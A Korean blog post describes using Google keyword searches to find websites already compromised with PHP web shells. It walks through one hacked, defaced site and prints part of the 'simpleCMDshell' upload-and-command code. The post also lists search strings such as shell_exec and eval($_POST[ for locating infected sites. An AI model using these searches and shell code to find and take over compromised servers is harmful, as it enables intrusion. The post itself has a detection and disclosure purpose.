본문 바로가기
기술의 달인

웹쉘 사이트 발견 및 탐지(구글검색 중심으로)

by 수미수미 2021. 10. 19.

특정 사이트 해킹 및 웹쉘 탐지

(피해 예방을 위한 구글 키워드 검색과 함께)

 

특정 사이트 해킹 등 웹쉘 흔적 탐지 확인

1. 저는 최근 특정한 민간 사이트 해킹 피해 예방을 위해

구글사이트를 이용한 웹쉘 탐지 키워드를 연구하였고

그 결과 한 특정 사이트에서 웹쉘이 업로드 되어

해킹된 흔적이 있는 민간 사이트를 발견하였고 

사이트 소유자에 추가피해 방지 및 예방책 안내 및 해킹사실 안내했습니다.

 

 

2. 상기 사이트는 운동기구 관련 사이트로

파일을 업로드 할 수 있는 게시판으로 구성되어 있었습니다.

하지만 위와 같이 서버에 파일을 업로드 할 수 있는

어느 특정한 웹쉘 코드가 삽입되어 있는 것이 발견되었습니다.

 

[ 아래 주소 확인 ]

http://xxxxxxxxxxxxx.net/skin31/request.php?unsingcode1=1313169244&unsingcode2=1313591110&code=bd91f5dcb3e4898b9ca6e031c7fb2e19

위 주소는 실제 주소가 변경된 주소입니다.

 

3. 아래와 같이 “simpleCMDshell”라는 웹쉘 이름으로

제작자는 “BodenTruppe“로 확인되고

웹상에서 서버의 쉘 명령어를 실행할 수 있는 코드인

”shell_exec“가 노출되어 있음이 확인되었습니다.

 

 

 

4. 해당코드를 소스보기로 확인한 결과 아래와 같은 코드로 구성되어 있습니다.

<!--?php $cmd = stripslashes($_REQUEST["-cmd"]);$sendfile=$_REQUEST["sendfile"];if($sendfile=="true") { $fn=$_FILES["file"]["name"];$tn=$_FILES["file"]["tmp_name"];if(move_uploaded_file($tn, dirname(__FILE__)."/".$fn)) $result="upload done";else $result="upload failed"; } print('<body bgcolor=#000000 text=#008000 onLoad="document.forms[0].elements[-cmd].focus()"-->

 

 

 

5. 이 사이트의 메인 도메인으로 접속해본 결과

아래와 같이 해당 사이트의 메인화면이

다음과 같이 만남 사이트로 이동되는 링크로

변조 되어 있는 일명 ”디페이스 해킹“을 당한 것으로 확인됩니다.

 

 

6. 해당 만남 사이트는 현재 접속되지 않는 것으로 확인된다.

무섭군요.. 자신도 모르게 사이트 메인화면이 해킹되어있다니요....

 

 

 

7. 위 도메인도 현재는 등록되지 않은 도메인으로 확인되어

이 사이트는 매우 오랜시간전에 해킹되어 방치되고 있는 것으로 판단됩니다.

 

8. 위 사이트의 해킹 흔적, 사이트 상태,

디페이스의 흔적을 종합적으로 검토한 결과

매우 오래전에 해킹되었던 것으로 판단됩니다.

 

웹쉘코드 키워드 기반 구글 검색

자, 그렇다면 이와 같은 해킹 및 웹쉘을 탐지하기 위해서는

자신의 홈페이지 파일에서 웹쉘 탐색을 생활화 하여야 겠지요...

 

하지만 저와 같이 공익목적으로 하는 사람들은

위와 같이 웹상에서 해킹된 쉘명령어를 실행시킬 수 있는 코드 중

많은 웹쉘에서 사용되는 코드 몇가지를 키워드로 하여

구글 검색하면 될 것입니다.

아래와 같은 키워드로 검색해보실까요...

‘shell_exec’,
‘request.getParameter("cmd");’,
‘eval($_POST['
getRuntime().exec() shell_exec, passthru, system, exec, popen eval, assert

 

위와 같이 웹쉘에서 애용하는 코드를 키워드로 구글 검색하면

현재 웹쉘이 업로드 된 사이트의 발견이 수월할 것입니다.

실제 본 문서에 등장하는 사이트도

구글에서 위 키워드로 검색하여 확인한 것입니다.

 

 

결론

민간사이트의 대부분이 전문 개발자를 두고 있지 않고

웹호스팅에 의존하므로 사이트 관리가 안되고

해킹 및 취약점의 해결이 안되고 있는 실정입니다. 

 

하지만 사이트 측에서는 이렇게 간단한 모니터링을 지속적으로 실시하고

저 또한 이러한 공익적 작업으로 사이트 소유자에게 통보 및 안내한다면

더욱 큰 해킹이나 웹쉘의 피해를 예방할 수 있을 것입니다.

 

해킹과 웹쉘은 또다른 피해를 양산하니까요~

 

저작자표시

'기술의 달인' 카테고리의 다른 글

도메인의 모든것 viewdns.info  (0) 2021.11.25
통신판매사업자 정보 200% 활용하기 !!  (0) 2021.11.04
후이즈로 아이피, 서버 정보 확인하기 WHOIS와 IP는 무엇인가?  (0) 2021.10.29
네트워크란 무엇인가?  (0) 2021.10.20
NFT 가 도대체 무엇인가?  (0) 2021.10.16

관련글

댓글

티스토리툴바